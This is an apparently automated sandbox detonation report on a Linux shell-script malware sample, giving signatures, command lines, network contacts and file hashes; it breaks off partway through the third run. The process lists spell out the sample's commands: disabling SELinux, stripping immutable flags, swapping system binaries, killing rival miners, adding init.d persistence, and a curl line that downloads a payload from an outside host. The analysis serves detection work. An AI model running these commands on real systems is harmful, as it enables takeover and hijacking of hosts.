Analysis Overview
SHA256
3e676ba390fe4cd218577761efacd4ef39eedfb1014832e63aa8e1b32614773b
Threat Level: Shows suspicious behavior
The file HMtWYpJGZVUZkrQK.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Enumerates running processes
Write file to user bin folder
Attempts to change immutable files
Disables SELinux
Modifies init.d
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Checks CPU configuration
Reads CPU attributes
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-13 23:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mount | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.BubyqF | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.yJP6CF | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin/lsof]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/acpid]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/anacron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apparmor]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apport]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/avahi-daemon]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/bluetooth]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups-browsed]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dns-clean]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/gdm3]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/grub-common]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/irqbalance]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kerneloops]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/network-manager]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth-log]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/pppd-dns]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsync]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/saned]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/speech-dispatcher]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/spice-vdagent]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ufw]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/unattended-upgrades]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/uuidd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/whoopsie]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/usr/bin/sort
[sort -u]
/bin/grep
[grep -o /proc/[0-9]\+]
/bin/mount
[mount]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | 0889.org | udp |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
Files
/etc/init.d/sedpxfBNa
| MD5 | 4156943ab8a824fcf4b04cc1362eb230 |
| SHA1 | f70925b017b133e308dd28655aecb7a355e03940 |
| SHA256 | 619b2c1d55f37ff0e5bedd273d0d13becb54400227dc60e7f544e5a02f7630b1 |
| SHA512 | aa43089c6a5d70f84349e8cb5183c2dce76894c4b14844f064392876bca422681b6d9d91c1528028db7a2c334c74cc38ae0855b31f7ea9d4cb58b558f2dc0a25 |
/etc/init.d/sedkz6RZ9
| MD5 | 290829a5efc55b7c435de0bb769f217b |
| SHA1 | 58663cd782ebfd62cfd1dbc05101767f1cddae46 |
| SHA256 | c30f6bd228f6a19050e80727800f3e848b99005e2e3c54ff6e210bab4093e449 |
| SHA512 | 3703dad2b8a8eade00c4bbe54b774dd35562877cbb475cf04c7bca96a5421129dfe95b82df692e7fb415a5e0319eb831a55149eda7e953816aaa88ebb2c2a27a |
/etc/init.d/sed0GUKie
| MD5 | 29b6e6ae2de1365c06806e18f18d8fab |
| SHA1 | 2d0509721648303a8bac612273c63c938fe8e253 |
| SHA256 | 4b93a446c6094a1ea265699d794171f358ea611d974eae6f728652c81e3df6ad |
| SHA512 | 3555a9c2be5953f2de10f06f65c45252e2fc9a7c769a15d80a5cc7652bb1ffc8797be2567bf19efe2fc23175b21021d51b9fe25556b0e13076e3afdc9b7c7693 |
/etc/init.d/sedZQsazd
| MD5 | a1f3d5bd15f8b85ab00fbcb827c0f0c4 |
| SHA1 | 4a4ef62a4c2397bc70eac13898145939569268a0 |
| SHA256 | 963c10b500751772551368cfa5496de7f199fa217445f27a1258aa9fde1ba53c |
| SHA512 | eef2cea41785a972b586d63fc56dbe40c5d3a09387ffd929d311577c5bd861ad73a6e561b011a7dad61dee6c23f35a081cd298579dbbb5fbb20057a7d98ee9ac |
/etc/init.d/sedQvKbJd
| MD5 | 4bf46072f9f13b2e38d58a053def37d5 |
| SHA1 | 94e4b56f7a5d40a40f256a474e244642ad778a4e |
| SHA256 | a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf |
| SHA512 | 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de |
/tmp/sh-thd.BubyqF
| MD5 | 2ff9930962f5ed39a68bfabddc3551ac |
| SHA1 | 9f99fbefee4a609f403025ed510c2fa93982303b |
| SHA256 | d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7 |
| SHA512 | 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df |
/etc/init.d/crontabs
| MD5 | f21f5717d956b60f695d350bbab05716 |
| SHA1 | 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f |
| SHA256 | c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e |
| SHA512 | 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
debian9-armhf-20240418-en
Max time kernel
149s
Max time network
13s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/sedxXliUx | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedxJDWUg | /bin/sed | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedXptBrl | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedqz14Ln | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedQAct27 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedjSL3gO | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed1G2Nou | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedKYm7AI | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedkEQzHQ | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedO2yYB2 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed3w2aIn | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedAWxBX7 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed4Pejsj | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedshh05b | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedNfkxxe | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedEf5nzK | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedJgobeX | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedQjVLAv | /bin/sed | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/find | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.QtKxCq | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.JBfcky | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/bin/mount
[mount]
/bin/grep
[grep -o /proc/[0-9]\+]
/usr/bin/sort
[sort -u]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | 0889.org | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
debian9-mipsbe-20240611-en
Max time kernel
17s
Max time network
19s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/local/sbin/mcron | /usr/local/sbin/mcron | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
